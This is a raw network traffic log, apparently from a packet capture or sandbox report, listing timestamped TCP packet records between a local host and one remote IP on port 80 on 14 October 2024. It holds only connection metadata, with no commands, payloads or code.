                    Oct 14, 2024 11:06:40.849912882 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.849912882 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.849929094 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.849941015 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.849951982 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.849963903 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850011110 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850038052 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850049019 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850060940 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850070953 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850089073 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850107908 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850130081 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850137949 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850141048 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850152969 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850166082 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850177050 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850177050 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850205898 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850274086 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850295067 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850315094 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850333929 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850334883 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850356102 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850356102 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850389004 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850399017 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850410938 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850431919 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850451946 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850457907 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850485086 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850507021 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850507975 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850528002 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850548983 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850552082 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850580931 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850598097 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850601912 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850622892 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850650072 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850656033 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850677013 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850701094 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850708008 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850722075 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850744009 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850750923 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850764036 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850785017 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850797892 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850805044 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850826979 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850832939 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850847960 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850868940 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850868940 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850900888 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850922108 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850943089 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850951910 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850964069 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.850976944 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.850995064 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851008892 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851015091 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851036072 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851057053 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851074934 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851083994 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851100922 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851105928 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851126909 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851146936 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851155996 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851176977 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851190090 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851200104 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851221085 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851248026 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851253033 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851284981 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851298094 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851305962 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851325989 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851346016 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851350069 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851367950 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851401091 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851413965 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851433992 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851454973 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851465940 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851479053 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851516962 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851553917 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851573944 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851609945 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851610899 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851632118 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851650953 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851658106 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851681948 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851699114 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851703882 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851725101 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851743937 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851744890 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851764917 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851793051 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851794958 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851815939 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851835966 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851839066 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851855993 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851876974 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851885080 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851897001 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851918936 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851941109 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851944923 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851963043 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.851969004 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.851984024 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852005005 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852006912 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852093935 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852116108 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852133989 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852140903 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852154016 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852161884 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852210045 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852210999 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852243900 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852264881 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852284908 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852289915 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852304935 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852324963 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852328062 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852345943 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852365971 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852374077 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852385044 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852411032 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852420092 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852437973 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852458000 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852472067 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852488995 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852499962 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.852509975 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852550030 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.852551937 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.898129940 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.937990904 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938097954 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938110113 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938143015 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938150883 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938154936 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938167095 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938213110 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938311100 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938322067 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938332081 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938349009 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938354969 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938363075 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938374996 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938386917 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938396931 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938397884 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938410997 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938426971 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938445091 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938575029 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938586950 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938596010 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938608885 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938620090 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938627005 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938637018 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938648939 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938648939 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938661098 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938667059 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938672066 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938683033 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938687086 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938698053 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938709974 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938718081 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938721895 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938735008 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938754082 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938771009 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938935041 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938946009 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938956976 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938966990 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938977957 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.938982010 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.938988924 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939002991 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939017057 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939022064 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939029932 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939055920 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939058065 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939069986 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939081907 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939095020 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939095020 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939116955 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939148903 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939161062 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939174891 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939198017 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939224005 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939248085 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939260006 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939270973 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939280987 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939291000 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939296961 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939304113 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939315081 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939322948 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939341068 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939349890 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939389944 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939419985 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939431906 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939449072 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939460039 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939472914 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939480066 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939491987 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939502954 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939519882 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939519882 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939532995 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939543962 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939568996 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939615011 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939625978 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939636946 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939650059 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939670086 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939742088 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939754963 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939765930 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939795971 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939798117 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939807892 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939820051 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939822912 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939857006 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939899921 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939913034 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939924955 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939934969 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939945936 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939953089 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939958096 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939970016 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.939971924 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.939990997 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940006018 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940022945 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940099001 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940109968 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940126896 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940138102 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940140009 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940150023 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940160990 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940167904 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940171957 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940184116 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940186977 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940206051 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940478086 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940489054 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940500021 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940510988 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940521955 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940525055 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940553904 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940557003 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940568924 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940581083 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940591097 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940602064 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940610886 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.940625906 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.940651894 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:45.904098034 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:17.348997116 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:17.353804111 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:17.354063034 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:17.354773045 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:17.359922886 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081156015 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081228018 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081234932 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081248999 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081254959 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081265926 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081285000 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081290960 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081295967 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081301928 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.081379890 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.081482887 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.086337090 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.086364031 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.086436033 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.170205116 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170236111 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170243025 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170250893 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170258045 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170317888 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.170372009 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.170593023 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170636892 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170648098 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170700073 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.170706034 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170712948 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.170768023 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.171428919 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.171437025 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.171448946 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.171454906 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.171462059 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.171487093 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.171535015 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.172251940 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.172278881 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.172286987 CEST8049912172.67.128.117192.168.2.6
